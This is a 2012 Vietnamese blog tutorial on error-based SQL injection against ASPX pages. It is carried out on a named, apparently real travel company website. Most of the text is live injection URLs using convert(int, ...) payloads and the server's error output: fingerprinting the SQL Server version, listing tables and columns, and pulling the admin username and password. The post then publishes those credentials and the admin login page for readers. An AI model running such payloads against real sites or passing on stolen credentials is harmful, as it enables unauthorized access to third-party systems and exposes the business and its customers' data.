9 thg 7, 2012
[TUT] khai thác SQL dạng aspx
vào việc luônvictim: http://www.saobientravel.com/
lấy em này làm dung dịch thí nghiệm:
http://www.saobientravel.com/Chi-tie...spx?idtour=183
việc tiếp theo là cho quì tím để nhận biết nó là axit hay bazơ.
http://www.saobientravel.com/Chi-tie...spx?idtour=183'
áh hự. nó ra lỗi này.
Quote:
| Unclosed quotation mark after the character string ''. |
Giờ ta tìm version của muối này :
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,@@version)-- -
ta đc
Quote:
| Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2) đó là version của nó  sever windows NT 5.2 |
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,db_name())-- -
Quote:
| nó đây : saobientravel_vn user của nó đây saobientravel_vn |
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
Quote:
| nó ra chỉ 1 table là 'KHACHHANG_53' |
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in () ))-- -
nó ra 1 table khác
'DONHANG_55'cứ như thế sẽ ra các table cần ììm
mình có check trước ròi, nó nhìu table name lắm đa số là giả
Quote:
| 'KHACHHANG_53','DONHANG_55','QUOCGIA_7','KHACHHANG ','DOITAC_43','quocgia','HOIDAP_44','DIEMDEN_KHACH SAN_41','QUANGCAO_22''HINHTOUR_36','QUANGCAO_22',' HINHTOUR_36','DIEMDEN_37','quangcao','HINHTOUR','D IEMDEN','PHUONGTIEN_39','HINHTINTUC_17','DICHVU_19 ','phuongtien','HINHSANPHAM_27','dichvu','PHONGKHA CHSAN_32','HINHQUANGCAO_23','CHINHANH_54','PHIEUXU AT_CHITIET_52','HINHKS','bookingtrain','PHIEUXUAT_ 51','HINHKHACHSAN_31','BAOGIA_42','PHIEUNHAP_CHITI ET_50','HINHGIOITHIEU_55','BANER_2','PHIEUNHAP_49' ,'HINHDICHVU_20','baner','NHANXET_5','HINHANH_12', 'VIDEO_14','nhanxet','hdtour','video','NGANHNGHE_5 4','hdhotel','TUYENDUNG_48','LOAIVIDEO_13','GUIMAI L_56','TOUR_PHUONGTIEN_40','LOAITUYENDUNG_47','GIO ITHIEU_6','TOUR_KHACHSAN_38','LOAITOUR_34','gioith ieu','TOUR_DIEMDEN','LOAITINTUC_15','giavisa','TOU R_35','LOAITAILIEU_45','giavetau','TOUR','LOAISANP HAM_25','giatour','TOP_MENU_53','LOAIQUANGCAO_21', 'giaphong','TINTUC_16','LOAIKHACHSAN_29','vungmien ','tintuc','LOAIHINHANH_11','tinhthanh','TINHTHANH _9','LOAIDICHVU_18','VUNGMIEN_8','LOAIBAOGIA_42_1' ,'THONGTINGUIMAIL_10','LOAIBANER_2_1','thongtingui mail','LIENKET_3','THELOAITOUR_33','lienket','THEL OAISANPHAM_24','KHlienhe','THELOAIKHACSAN_28','KHA CHSAN_DIEMDEN','TAILIEU_46','KHACHSAN_30','TAIKHOA N_1','KHACHSAN','TaiKhoan' |
đây là table ta cần tìm 'TaiKhoan' k có số phía sau
ừm mà chỉ có trang này thỳ có _số mới là giả vì mỗi trang mỗi khác mà
ok giờ mình sẽ get column
http://www.saobientravel.com/Chi-tiet-tour.aspx
?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') ))-- -
Quote:
| có 1 column 'IDtaikhoan' mình sẽ get column khác |
Quote:
| nó ra 'TENDANGNHAP' . ta tiếp tục thêm vào để get như get table |
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') and column_name not in ('IDtaikhoan','TENDANGNHAP') ))-- -
Quote:
| kết quả là 'MATKHAU' |
bây giờ mình sẽ get user và pass
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 TENDANGNHAP from TaiKhoan ))-- -
và
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 MATKHAU from TaiKhoan ))-- -
kết quả :
user: admin
pass: admin
tặng anh em link admin :
http://www.saobientravel.com/dangnhap.aspx
![[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixEoUmpwXUmG6BwNUxkp2bx9LwFoIovVmTOD9ZZ_owzNehJ3jW-beXvaWzjpu7tCCpOzOkzIxz-wIwL9Dt8_YxyKl604U03Hd3Z1E3mlDvIB0u0IIf-WtvpXRfkgSv0Y9BzB9EkC6J0uI/s72-c/70.jpg)
Không có nhận xét nào:
Đăng nhận xét